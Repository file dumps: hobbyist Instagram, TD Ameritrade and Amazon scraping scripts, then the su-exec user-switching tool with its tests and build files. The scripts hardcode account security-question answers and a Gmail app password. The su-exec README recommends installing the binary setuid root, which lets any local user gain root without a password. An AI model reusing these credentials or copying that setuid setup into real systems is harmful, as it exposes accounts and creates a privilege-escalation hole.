10).until(EC.presence_of_element_located((By.NAME, \"username\")))\n username_element.send_keys(self.username)\n self.driver.find_element_by_name('password').send_keys(self.password)\n time.sleep(1)\n self.driver.find_elements_by_xpath(\"//div[contains(text(), 'Log In')]\")[0].click()\n\n def nav_page(self, page):\n self.driver.get('{}/{}/'.format(self.base_url, page))\n time.sleep(2)\n\n def get_likes(self, amount):\n\n global likes\n time.sleep(1)\n self.driver.find_element_by_class_name('_bz0w').click()\n i = 1\n while i <= amount:\n time.sleep(2)\n try:\n self.driver.find_element_by_xpath(\n '/html/body/div[4]/div[2]/div/article/div[2]/section[2]/div/div[2]/button').click()\n likes = self.get_names()\n print(likes)\n except NoSuchElementException:\n print('not enough activity on post')\n self.driver.find_element_by_xpath(\n '/html/body/div[4]/div[2]/div/article/div[2]/section[2]/div/div[1]').click()\n continue\n i += 1\n df = pd.DataFrame.from_dict({'likes': likes}, orient='index').T\n\n df.to_csv('follow.csv')\n print(df)\n\n def get_names(self):\n time.sleep(1)\n scroll_box = self.driver.find_element_by_xpath('/html/body/div[5]/div/div[2]/div')\n last_ht, ht = 0, 1\n while last_ht != ht:\n last_ht = ht\n time.sleep(1)\n ht = self.driver.execute_script(\"\"\"\n arguments[0].scrollTo(0, arguments[0].scrollHeight)\n return arguments[0].scrollHeight\"\"\", scroll_box)\n links = scroll_box.find_elements_by_tag_name('a')\n names = [name.text for name in links if name.text != '']\n self.driver.find_elements_by_xpath('/html/body/div[5]/div/div[1]/div/div[2]/button')[0].click()\n self.driver.find_element_by_class_name('_65Bje').click()\n return names\n\n\nif __name__ == '__main__':\n ig_bot = Instabot('USERNAME', 'PASSWORD')\n time.sleep(3)\n ig_bot.nav_page('USERNAME')\n ig_bot.get_likes(5)\n ig_bot.get_names()\n print(Instabot.username)\n"
},
{
"alpha_fraction": 0.6104331612586975,
"alphanum_fraction": 0.6211104393005371,
"avg_line_length": 37.56470489501953,
"blob_id": "bfb336c2c16cfcbeb01a2dca538c13dac2b4ce08",
"content_id": "3306c4249d233c68224eab7867d834cd928d0b59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3278,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 85,
"path": "/Social_media_automation/insta_track_ghosts.py",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nimport os\nimport time\nfrom selenium.common.exceptions import NoSuchElementException\n\n#IMPORTANT: don't try to grab multiple lists from this script just get likers and followers import any other lists\n# don't forget you need to convert followers and following to a csv that you can then import into this script\n\nclass Instabot(object):\n username = None\n \"\"\"\n initializes an instance of the Instabot class.\n \n Call the login function to authenticate a user with IG\n \n Args:\n username:str: The instagram username for the user\n password:str: The instagram password for the user\n \n Attributes:\n driver.Selenium.webdriver.Chrome: The chromedriver that is used to automate browser activity\n \"\"\"\n\n def __init__(self, username, password):\n self.username = username\n self.password = password\n self.driver = webdriver.Chrome('chromedriver80.exe')\n self.base_url = 'https://www.instagram.com'\n self.login()\n\n def login(self):\n self.driver.get('{}/accounts/login/'.format(self.base_url))\n username_element = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.NAME, \"username\")))\n username_element.send_keys(self.username)\n self.driver.find_element_by_name('password').send_keys(self.password)\n time.sleep(1)\n self.driver.find_elements_by_xpath(\"//div[contains(text(), 'Log In')]\")[0].click()\n\n def nav_page(self, page):\n self.driver.get('{}/{}/'.format(self.base_url, page))\n time.sleep(2)\n\n def get_ghosts(self, amount):\n\n time.sleep(1)\n self.driver.find_element_by_class_name('_bz0w').click()\n i = 1\n while i <= amount:\n time.sleep(2)\n try:\n self.driver.find_element_by_xpath('_8A5w5').click()\n likes = self.get_names()\n self.driver.find_element_by_class_name('_65Bje').click()\n print(likes)\n except NoSuchElementException as err:\n print('not enough activity on post')\n self.driver.find_element_by_xpath('/html/body/div[4]/div[2]/div/article/div[2]/section[2]/div/div[1]').click()\n continue\n i += 1\n\n def get_names(self):\n time.sleep(1)\n scroll_box = self.driver.find_element_by_xpath('/html/body/div[5]/div/div[2]')\n last_ht, ht = 0, 1\n while last_ht != ht:\n last_ht = ht\n time.sleep(1)\n ht = self.driver.execute_script(\"\"\"\n arguments[0].scrollTo(0, arguments[0].scrollHeight)\n return arguments[0].scrollHeight\"\"\", scroll_box)\n links = scroll_box.find_elements_by_tag_name('a')\n names = [name.text for name in links if name.text != '']\n self.driver.find_elements_by_xpath('Nm9Fw')[0].click()\n return names\n\n\nif __name__ == '__main__':\n ig_bot = Instabot('USERNAME', 'PASSWORD')\n time.sleep(3)\n ig_bot.nav_page('aurbataomememaker')\n ig_bot.get_names()\n print(Instabot.username)\n"
},
{
"alpha_fraction": 0.7187948226928711,
"alphanum_fraction": 0.7216642498970032,
"avg_line_length": 31.904762268066406,
"blob_id": "164b037451cf6cbc5aa11e73794e597fdc33d11f",
"content_id": "9d4afbd0b32fc6a176dcd870177177f7d6f60616",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 697,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 21,
"path": "/Social_media_automation/Track/data_anal.py",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "import csv\nimport numpy\nimport os\n# takes data written to csv by insta_follow.py and opens it \nwith open('follow.csv', 'r') as csv_file:\n lines = csv_file.readlines()\nfollowing = []\nfollowers = []\n# appends data do lists\nfor line in lines:\n data = line.split(',')\n following.append(data[1])\n followers.append(data[2])\nprint(following)\nprint(followers)\n# shows user what followers are not following them back\nnot_following_back = [user for user in following if user not in followers]\nnot_following_back = [i for i in not_following_back if i]\nprint(not_following_back)\nprint(len(not_following_back))\nprint('It appears', len(not_following_back), 'users are not following you back')\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6378066539764404,
"alphanum_fraction": 0.6378066539764404,
"avg_line_length": 26.760000228881836,
"blob_id": "6343c0d9dda20c38b6cc40d7cf22c56e42d19677",
"content_id": "d9e349141b75759f6c06371fbff7ad04905aaded",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 693,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 25,
"path": "/Social_media_automation/Track/untitled.py",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "import pandas as pd\ndef read_as_dataframe(file):\n df = pd.read_csv(file)\n print(df)\n return df\ndef visually_inspect(df):\n print(df.head())\n print(df.tail())\n print(df.column())\n print(df.shape())\n print(df.info())\n print(df.describe())\n print(df['major'].value_counts(dropna=False)\n print(df['median'].value_counts(dropna=False)\n print(df['unemployment'].value_counts(dropna=False)\ndef cleaning(df):\n df['major'] = df['major'].astype(str)\n df['median'] = df['median'].astype(int)\n df['unemployment'] = df['unemployment'].astype(int)\n return df\ndef main():\n df = read_as_dataframe(all_ages.csv)\n visually_inspect(df)\n cleaning(df)\nmain()"
},
{
"alpha_fraction": 0.6045314073562622,
"alphanum_fraction": 0.6120837330818176,
"avg_line_length": 33.67856979370117,
"blob_id": "a72f10ee80f70aa43dde825dd97c8557bd3729ce",
"content_id": "01890513c831d1bf37de684c0208e7571bba1ca3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2913,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 84,
"path": "/Social_media_automation/Track/following.py",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nimport os\nimport time\nimport pandas as pd\n\n\nclass Instabot(object):\n username = None\n \"\"\"\n initializes an instance of the Instabot class.\n \n Call the login function to authenticate a user with IG\n \n Args:\n username:str: The instagram username for the user\n password:str: The instagram password for the user\n \n Attributes:\n driver.Selenium.webdriver.Chrome: The chromedriver that is used to automate browser activity\n \"\"\"\n\n def __init__(self, username, password):\n self.username = username\n self.password = password\n self.driver = webdriver.Chrome('../chromedriver80.exe')\n self.base_url = 'https://www.instagram.com'\n self.login()\n\n def login(self):\n self.driver.get('{}/accounts/login/'.format(self.base_url))\n username_element = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.NAME, \"username\")))\n username_element.send_keys(self.username)\n self.driver.find_element_by_name('password').send_keys(self.password)\n time.sleep(1)\n self.driver.find_elements_by_xpath(\"//div[contains(text(), 'Log In')]\")[0].click()\n\n def nav_page(self, page):\n self.driver.get('{}/{}/'.format(self.base_url, page))\n time.sleep(2)\n\n def get_following_data(self):\n timer = time.perf_counter()\n self.driver.find_element_by_xpath('//a[contains(@href, \"/following\")]').click()\n following = self.get_names()\n time.sleep(1)\n following_data = [user for user in following]\n n = []\n print(following_data)\n print(len(following_data))\n print(timer)\n df = pd.DataFrame.from_dict({'following': following_data, 'n': n},\n orient='index').T\n df.to_csv('follow.csv')\n print(df)\n\n def get_names(self):\n time.sleep(1)\n scroll_box = self.driver.find_element_by_class_name('isgrP')\n last_ht, ht = 0, 1\n while last_ht != ht:\n last_ht = ht\n time.sleep(1)\n ht = self.driver.execute_script(\"\"\"\n arguments[0].scrollTo(0, arguments[0].scrollHeight)\n return arguments[0].scrollHeight\"\"\", scroll_box)\n links = scroll_box.find_elements_by_tag_name('a')\n names = [name.text for name in links if name.text != '']\n self.driver.find_elements_by_xpath('/html/body/div[4]/div/div[1]/div/div[2]')[0].click()\n return names\n\n\nif __name__ == '__main__':\n ig_bot = Instabot('USERNAME', 'PASSWORD')\n time.sleep(3)\n ig_bot.nav_page('USERNAME')\n ig_bot.get_following_data()\n ig_bot.get_names()\n\n time.sleep(3)\n\n print(Instabot.username)\n"
},
{
"alpha_fraction": 0.5929012894630432,
"alphanum_fraction": 0.6033880114555359,
"avg_line_length": 37.340206146240234,
"blob_id": "6ea4108fd2c6f80821951780cf2db3ddad8cd3aa",
"content_id": "a94342b5eb823bb8043075e843e50648d9fb1179",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3719,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 97,
"path": "/TD-ameritrade_oauth/td_auth.py",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "import requests\nimport time\nimport urllib\nfrom urllib import parse\nfrom splinter import Browser\nfrom variables import *\nimport os\n\n\nclass td_auth(object):\n def __init__(self, client_id, account_num, password):\n self.password = password\n self.client_id = client_id\n self.account_num = account_num\n self.access_code = None\n self.access_token = None\n\n def get_access_code(self, client_id):\n driver = {'chromedriver.exe'}\n browser = Browser('chrome', driver, headless=False)\n # define components of url\n method = 'GET'\n url = 'https://auth.tdameritrade.com/auth?'\n client_code = client_id + '@AMER.OAUTHAP'\n payload = {'response_type': 'code', 'redirect_uri': 'http://32.211.92.157', 'client_id': client_code}\n # build url\n my_url = requests.Request(method, url, params=payload).prepare()\n my_url = my_url.url\n browser.visit(my_url)\n # login\n payload = {'username0': user_id, 'password': password}\n browser.find_by_id('username0').first.fill(payload['username0'])\n time.sleep(1)\n browser.find_by_id('password').first.fill(payload['password'])\n time.sleep(1)\n browser.find_by_id('accept').first.click()\n time.sleep(1)\n browser.find_by_text(\"Can't get the text message?\").first.click()\n browser.find_by_value('Answer a security question').first.click()\n # answer security questions\n if browser.is_text_present('What was the name of your high school?'):\n browser.find_by_id('secretquestion0').first.fill('East Lyme High School')\n\n elif browser.is_text_present('What was your high school mascot?'):\n browser.find_by_id('secretquestion0').first.fill('The Vikings')\n\n elif browser.is_text_present('What was the name of your first pet?'):\n browser.find_by_id('secretquestion0').first.fill('Cody')\n elif browser.is_text_present(\n 'What was the name of the town your grandmother lived in? (Enter full name of town only.)'):\n browser.find_by_id('secretquestion0').first.fill('Scranton')\n browser.find_by_id('accept').first.click()\n time.sleep(1)\n browser.find_by_id('accept').first.click()\n # parse url\n time.sleep(1)\n new_url = browser.url\n access_code = urllib.parse.unquote(new_url.split('code=')[1])\n # close browser\n browser.quit()\n self.access_code = access_code\n print('access_code:', access_code)\n\n return access_code\n\n def get_access_token(self):\n # define endpoint\n url = r'https://api.tdameritrade.com/v1/oauth2/token'\n headers = {'Context-Type': 'application/x-www-form-urlencoded'}\n payload = {'grant_type': 'authorization_code',\n 'access_type': 'offline',\n 'code': self.access_code,\n 'client_id': client_id,\n 'redirect_uri': 'http://32.211.92.157'}\n # post data for token\n authreply = requests.post(url, headers=headers, data=payload)\n # convert json-dict\n decoded_content = authreply.json()\n print(decoded_content)\n\n access_token = decoded_content['access_token']\n os.environ['td_token'] = str(access_token)\n self.access_token = access_token\n\n return access_token\n\n def authenticate(self):\n try:\n self.access_token = os.environ['td_token']\n except KeyError:\n self.get_access_code(client_id)\n self.get_access_token()\n\n\nif __name__ == '__main__':\n td_auth = td_auth(client_id, account_num, password)\n td_auth.authenticate()\n"
},
{
"alpha_fraction": 0.6552901268005371,
"alphanum_fraction": 0.658703088760376,
"avg_line_length": 17.3125,
"blob_id": "1b262f155e515d6ffce6141d76618c8f26dc5d76",
"content_id": "0f18d09d26999ab4fbb518fecd2bb0abbb357694",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 293,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 16,
"path": "/Social_media_automation/Track/anal_test.py",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "import multiprocessing\nfrom multiprocessing import Pool\nimport os\nimport sys\n\n\ndef run_file(filename):\n os.system('{} {}'.format(sys.executable, filename))\n\n\nfilenames = ['following.py', 'followers.py']\n\n\nif __name__ == '__main__':\n with Pool(2) as p:\n p.map(run_file, filenames)\n"
},
{
"alpha_fraction": 0.8148148059844971,
"alphanum_fraction": 0.8148148059844971,
"avg_line_length": 133,
"blob_id": "468c803c7003be75c2868692679ddfffeff547ed",
"content_id": "a000154937b7d9325fe72ed426b3eab4e2294ba3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 135,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 1,
"path": "/README.md",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "All contents of this repository are to show skills developed in web automation and web scraping for data to use in personal projects.\r\n"
},
{
"alpha_fraction": 0.6063968539237976,
"alphanum_fraction": 0.6586161851882935,
"avg_line_length": 28.461538314819336,
"blob_id": "dd81dd0fef7003f746848a1219f018d8fb6a4842",
"content_id": "c9318628ef10c4f9b431a7b6772eed689b4334db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1532,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 52,
"path": "/Simple_amazon_web_scraper/amzn_scrape.py",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "import requests\nfrom bs4 import BeautifulSoup\nimport smtplib\nimport time\nurl = 'https://www.amazon.com/Upgrade-3500Lumens-Projector-Supported-Smartphone/dp/B07YBRGLGW/ref=sr_1_9?crid' \\\n '=3LWI7WTR8IQGH&keywords=projector&qid=1578782732&sprefix=projector%2Caps%2C212&sr=8-9 '\n\nheaders = {\"user-agent\": 'YOUR USER AGENT (can be found with google search)'\n }\n\n\ndef check_price():\n page = requests.get(url, headers=headers)\n\n soup1 = BeautifulSoup(page.content, 'html.parser')\n soup2 = BeautifulSoup(soup1.prettify(), 'html.parser')\n\n price = soup2.find(id=\"priceblock_ourprice\").get_text()\n title = soup2.find(id=\"title\").get_text()\n converted_price = float(price[1:6])\n\n if (converted_price < 59.99):\n send_mail()\n print(converted_price)\n print(title.strip())\n\n if (converted_price < 59.99):\n send_mail()\n\n\ndef send_mail():\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.ehlo()\n server.starttls()\n server.ehlo()\n\n server.login('[email protected]', 'cuglpbvcqdnzjefk')\n subject = 'Price has dropped!'\n body = 'Check the link: https://www.amazon.com/Upgrade-3500Lumens-Projector-Supported-Smartphone/dp/B07YBRGLGW/ref=sr_1_9?crid' \\\n '=3LWI7WTR8IQGH&keywords=projector&qid=1578782732&sprefix=projector%2Caps%2C212&sr=8-9 '\n msg = f\"Subject: {subject}\\n\\n{body}\"\n server.sendmail(\n '[email protected]',\n '[email protected]',\n msg\n )\n print('EMAIL HAS BEEN SENT')\n server.quit()\n\nwhile (True):\n check_price()\n time.sleep(86400)\n"
}
] | 10 |
NobodyXu/su-any-exec
|
https://github.com/NobodyXu/su-any-exec
|
614831fa3c643e13918e0a9b510ed2fd4680171b
|
1fbdd4c0b54ee8739aa9731a74260ef5d2321b97
|
e5c3a5345b556edbfc5de39106217d386d6d8ee9
|
refs/heads/master
| 2021-01-02T03:32:34.059393 | 2020-03-05T05:41:21 | 2020-03-05T05:41:21 | 239,472,173 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6877275109291077,
"alphanum_fraction": 0.7152886390686035,
"avg_line_length": 34.94392395019531,
"blob_id": "06f3b6d20a518da1bf877eb8e5da8c41f03149b9",
"content_id": "8c6e6180e82f37fb4c1603f375905b44cd509993",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3846,
"license_type": "permissive",
"max_line_length": 141,
"num_lines": 107,
"path": "/README.md",
"repo_name": "NobodyXu/su-any-exec",
"src_encoding": "UTF-8",
"text": "# su-exec\nswitch user and group id and exec without passwd, can be used to replace sudo when building container.\n\n## Purpose\n\nThis is a simple tool that will simply execute a program with different\nprivileges. The program will be exceuted directly and not run as a child,\nlike su and sudo does, which avoids TTY and signal issues (see below).\n\nNotice that su-exec depends on being run by the root user, non-root\nusers do not have permission to change uid/gid, or you need to setuid on it.\n\n## Usage\n\n```shell\nsu-exec user-spec command [ arguments... ]\n```\n\n`user-spec` is either a user name (e.g. `nobody`) or user name and group\nname separated with colon (e.g. `nobody:ftp`). Numeric uid/gid values\ncan be used instead of names. Example:\n\n```shell\n$ su-exec apache:1000 /usr/sbin/httpd -f /opt/www/httpd.conf\n```\n\n### Replace `sudo`\n\nIf you compile softwares in a container, you probably need `sudo`, since compiling with root may not be\na good idea and some `Makefile` like `lede` even forbidden building as root.\n\nHowever, `sudo` is such a overkill for unattented auto-build of a container since\n - It requires dependencies to be installed.\n - You need to configure `sudo` to allow password-less `sudo` for your user\n - You cannot run `sudo apt-get remove -y sudo` to uninstall, you have to somewhat switch to root user without `sudo`\n to uninstall it.\n\nSo how to replace `sudo` with `su-exec` for containers? Simple, just execute the following lines with `root`:\n\n\n - `14.5kb` when building using `glibc2.3`, `clang-9.0.0-2` and `lld-9.0.0` \n - `14.0kb` when building using `musl-1.2.0`, `clang-9.0.0-2` and `lld-9.0.0`.\n - `53.3kb` when still using the above toolchain, but instead built with `-static`.\n\n```\ncd /usr/local/bin/\n\n# For dynamic-linked glibc, 14.5kb\nwget https://github.com/NobodyXu/su-exec/releases/download/v0.3.1/su-exec\n\n# For dynamic-linked musl-libc, 14.0kb\nwget https://github.com/NobodyXu/su-exec/releases/download/v0.3.1/su-exec-musl\n\n# For static-linked musl-libc, 53.3kb\nwget https://github.com/NobodyXu/su-exec/releases/download/v0.3.1/su-exec-static-musl\n\nchmod a+xs su-exec\n```\n\nRemoving `su-exec` is pretty simple:\n\n```\nsu-exec root:root rm /usr/local/bin/su-exec\n```\n\n## TTY & parent/child handling\n\nNotice how `su` will make `ps` be a child of a shell while `su-exec`\njust executes `ps` directly.\n\n```shell\n$ docker run -it --rm alpine:edge su postgres -c 'ps aux'\nPID USER TIME COMMAND\n 1 postgres 0:00 ash -c ps aux\n 12 postgres 0:00 ps aux\n$ docker run -it --rm -v $PWD/su-exec:/sbin/su-exec:ro alpine:edge su-exec postgres ps aux\nPID USER TIME COMMAND\n 1 postgres 0:00 ps aux\n```\n\n## Possible Vulnerabilities\n\n - `su-exec` is not like `sudo` but more like `su`, it does not modify any environment variables other than `HOME`, `USER`, `LOGNAME`, which \n might be undesirable. 
To workaround, use `su-exec env var=val command arg`.\n\n### Vulnerabilities that does not affect container\n\n - Due to the fact that `su-exec` does not allocate new tty, it is vulnerable to [TTY hijacking and arbitrary code execution][1].\n An easy workaround will be to `chmod 600 /dev/tty`, but to ensure the change is persistent, you need to modify udev rule.\n\n## Why reinvent gosu?\n\nThis does more or less exactly the same thing as [gosu](https://github.com/tianon/gosu)\nbut it is only\n\n - `14.3kb` when building using `glibc2.3`, `clang-9.0.0-2` and `lld-9.0.0` \n - `13.9kb` when building using `musl-1.2.0`, `clang-9.0.0-2` and `lld-9.0.0`.\n - `45.6kb` when still using the above toolchain, but instead built with `-static`.\n\ninstead of `1.7MB`, which is running `gosu 1.10.1` from `apt`.\nBoth are installed on `Intel x86-64` platform.\n\n[1]: https://ruderich.org/simon/notes/su-sudo-from-root-tty-hijacking\n\n## Testing\n\nRun `docker build .` where `docker` can be replace by `podman`, or `buildah`.\n"
},
{
"alpha_fraction": 0.38165295124053955,
"alphanum_fraction": 0.4539160430431366,
"avg_line_length": 33.49253845214844,
"blob_id": "c0b2e97bf210c871d6e25e55b9472b465c1dffdf",
"content_id": "73d50d82d202e90ce231420b9c15ecb75f16753f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2311,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 67,
"path": "/test_exe.py",
"repo_name": "NobodyXu/su-any-exec",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n\nimport os\nimport sys\nimport subprocess\n\ndef run(command, **kwargs):\n print(\"Running\", command)\n return subprocess.run(command, **kwargs)\n\n#def usage_test(exe, test):\n# stderr = run([exe], stderr = subprocess.PIPE, text = True, check = True).stderr\n# usage = \"{}: Usage: {} user-spec command [args]\".format(os.path.basename(exe), exe)\n# if stderr != usage:\n# raise AssertionError(\"stderr '{}' != usage '{}'\".format(stderr, usage))\n\ndef spec_test(exe, test):\n for spec in test[\"specs\"]:\n run([exe, spec, \"./Assert.py\"] + test[\"asserted\"], check = True)\n\ntests = [\n {\n \"specs\": [\"\", \":\", \"0\", \"root\", \"0:\", \"root:\", \":0\", \":root\", \"root:root\", \"root:0\", \"0:root\"],\n \"asserted\": [\"0\", \"0\", \"[0]\", \"root\", \"root\", \"/root\"],\n \"func\": spec_test\n },\n {\n \"specs\": [\"test1\", \"1000\"],\n \"asserted\": [\"1000\", \"1000\", \"[1000, 1002]\", \"test1\", \"test1\", \"/home/test1\"],\n \"func\": spec_test\n },\n {\n \"specs\": [\"1000:1000\", \"test1:1000\", \"1000:test1\", \"test1:test1\"],\n \"asserted\": [\"1000\", \"1000\", \"[1000]\", \"test1\", \"test1\", \"/home/test1\"],\n \"func\": spec_test\n },\n {\n \"specs\": [\"test2\", \"test2:test2\", \"1001:1001\", \"test2:1001\", \"1001:test2\"],\n \"asserted\": [\"1001\", \"1001\", \"[1001]\", \"test2\", \"test2\", \"/home/test2\"],\n \"func\": spec_test\n },\n {\n \"specs\": [\"test1:test2\", \"1000:1001\"],\n \"asserted\": [\"1000\", \"1001\", \"[1001]\", \"test1\", \"test1\", \"/home/test1\"],\n \"func\": spec_test\n },\n {\n \"specs\": [\"10293:29304\"],\n \"asserted\": [\"10293\", \"29304\", \"[29304]\", \"10293\", \"10293\", \"/\"],\n \"func\": spec_test\n }\n ]\n\ndef main():\n for exe in sys.argv[1 : ]:\n for test in tests:\n test[\"func\"](exe, test)\n\nif __name__ == \"__main__\":\n try:\n main()\n except AssertionError as e:\n print(\"AssertionError:\", e)\n sys.exit(1)\n except subprocess.CalledProcessError as e:\n print(\"subprocess.CalledProcessError\", e)\n sys.exit(1)\n"
},
{
"alpha_fraction": 0.5463215112686157,
"alphanum_fraction": 0.5735694766044617,
"avg_line_length": 26.185184478759766,
"blob_id": "8615f8b7ab6d958c107df2ad4019ab2eb45b0def",
"content_id": "d5559469990f06a8816cf0c1c13f0628bba13c22",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 734,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 27,
"path": "/Assert.py",
"repo_name": "NobodyXu/su-any-exec",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n\nimport sys\nimport os\n\ndef assertEqual(expr1, expr2):\n result1 = eval(expr1)\n result2 = eval(expr2)\n if result1 != result2:\n msg = \"{} '{}' != {} '{}'\".format(expr1, result1, expr2, result2)\n raise AssertionError(msg)\n\ndef main():\n assertEqual(\"int(sys.argv[1])\", \"os.getuid()\")\n assertEqual(\"int(sys.argv[2])\", \"os.getgid()\")\n assertEqual(\"sys.argv[3]\", \"str(os.getgroups())\")\n \n assertEqual(\"sys.argv[4]\", \"os.getenv('USER')\")\n assertEqual(\"sys.argv[5]\", \"os.getenv('LOGNAME')\")\n assertEqual(\"sys.argv[6]\", \"os.getenv('HOME')\")\n\nif __name__ == \"__main__\":\n try:\n main()\n except AssertionError as e:\n print(\"AssertionError:\", e)\n sys.exit(1)\n"
},
{
"alpha_fraction": 0.6872549057006836,
"alphanum_fraction": 0.6931372284889221,
"avg_line_length": 29,
"blob_id": "27857ade6c1e2ea63b35f5aa8d005f5787c837a5",
"content_id": "8368dece8ae98062f5b400353c2e2988156f205c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1020,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 34,
"path": "/Dockerfile",
"repo_name": "NobodyXu/su-any-exec",
"src_encoding": "UTF-8",
"text": "FROM nobodyxu/apt-fast:latest-debian-buster-slim AS apt-fast\n\nFROM nobodyxu/musl-libc:latest-debian-buster-slim AS base\nCOPY --from=apt-fast /usr/local/ /usr/local/\n\n# Prepare Environment\n## Install dependencies\nRUN apt-auto install -y --no-install-recommends \\\n clang lld llvm make python3\n\n## Configure llvm as default toolchain\n### Use ld.ldd as default linker\nRUN ln -f $(which ld.lld) /usr/bin/ld\n\n## For testing su-exec-*\nRUN useradd -m test1 && useradd -m test2\nRUN groupadd group1 && addgroup test1 group1\n\nRUN /usr/local/sbin/rm_apt-fast.sh\n\n## Build su-exec*\nADD * /usr/local/src/su-exec/\nWORKDIR /usr/local/src/su-exec/\n\n# Build only dynamic-version for glibc as static version is buggy\nRUN CC=clang make su-exec -j $(nproc) && \\\n mv su-exec /usr/local/sbin/\n\nRUN CC=musl-clang make su-exec su-exec-static -j $(nproc) && \\\n mv su-exec /usr/local/sbin/su-exec-musl && \\\n mv su-exec-static /usr/local/sbin/su-exec-musl-static\n\n# Test\nRUN ./test_exe.py /usr/local/sbin/*\n"
},
{
"alpha_fraction": 0.555343508720398,
"alphanum_fraction": 0.5687022805213928,
"avg_line_length": 31.6875,
"blob_id": "fee00637a3ff78c86d43047c43b9156acc90a48f",
"content_id": "44ac7c30b4acdcd244536fc21d05165261a65ce7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 524,
"license_type": "permissive",
"max_line_length": 163,
"num_lines": 16,
"path": "/Makefile",
"repo_name": "NobodyXu/su-any-exec",
"src_encoding": "UTF-8",
"text": "\nCFLAGS ?= -Wall -Werror -std=gnu11 $(shell echo 'int main(int argc, char* argv[]) { return 0; }' | $(CC) -x c -Oz - >/dev/null 2>&1 && echo -Oz || echo -Os) -flto \nLDFLAGS ?= -fvisibility=hidden -Wl,--plugin-opt=O3 -Wl,--icf=all -Wl,-O2 -Wl,--discard-all -Wl,--strip-all -Wl,--as-needed -Wl,--gc-sections\n\nPROG := su-exec\nSRCS := $(PROG).c\n\nall: $(PROG)\n\n$(PROG): $(SRCS)\n\t$(CC) $(CFLAGS) -o $@ $^ $(LDFLAGS)\n\n$(PROG)-static: $(SRCS)\n\t$(CC) $(CFLAGS) -o $@ $^ -static $(LDFLAGS)\n\nclean:\n\trm -f $(PROG) $(PROG)-static a.out\n"
},
{
"alpha_fraction": 0.49288254976272583,
"alphanum_fraction": 0.5077105760574341,
"avg_line_length": 21.1842098236084,
"blob_id": "6970e7da9323c999228f2d88175568b19b9dd4a6",
"content_id": "ac5a0b89fc0e2206cac2afdeb4395d6aa0747a9e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 3372,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 152,
"path": "/su-exec.c",
"repo_name": "NobodyXu/su-any-exec",
"src_encoding": "UTF-8",
